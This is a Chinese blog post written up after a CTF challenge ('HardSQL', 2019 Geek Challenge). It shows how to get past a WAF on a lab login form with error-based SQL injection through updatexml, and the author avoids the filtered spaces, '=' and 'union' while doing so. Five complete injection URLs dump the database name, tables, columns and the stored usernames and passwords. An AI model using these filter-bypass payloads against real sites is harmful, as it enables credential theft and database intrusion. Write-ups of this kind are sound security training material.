[极客大挑战 2019]HardSQL

进入题目,一个登录框。

 

 

测试了下万能密码登录,无果,有WAF拦截,那接下来就是绕过WAF。

 

 

先抓包用bp进行FUZZ,看看有那些没有被拦截的函数。通过手工FUZZ和bpFUZZ结合,发现过滤了and、= 空格 union等多个sql关键字。

 

 

发现有一些,报错注入的函数是没有被过滤的,那我们这题就可以通过报错注入来进行注入。

 

 

这里我们利用updatexml函数进行报错注入。

payload

#查看数据库信息
http://2d43986a-ef4e-4759-9fa4-8443817eb39a.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123

 

 

#查看数据库里面的表
http://2d43986a-ef4e-4759-9fa4-8443817eb39a.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123

 

 

#查看数据表中的字段
http://2d43986a-ef4e-4759-9fa4-8443817eb39a.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(%27H4rDsq1%27)),0x7e),1))%23&password=123

 

 

#查询字段里面的内容
http://2d43986a-ef4e-4759-9fa4-8443817eb39a.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(username,%27~%27,password))from(H4rDsq1)),0x7e),1))%23&password=123

 

 

因为报错注入对报错出的内容有长度限制,所以我们用left()right()语句分别查询,然后再进行flag的拼接。

#righe
http://2d43986a-ef4e-4759-9fa4-8443817eb39a.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123

 

 

拼接即可得到flag 

posted @ 2021-09-01 16:13  随风kali  阅读(502)  评论(0编辑  收藏  举报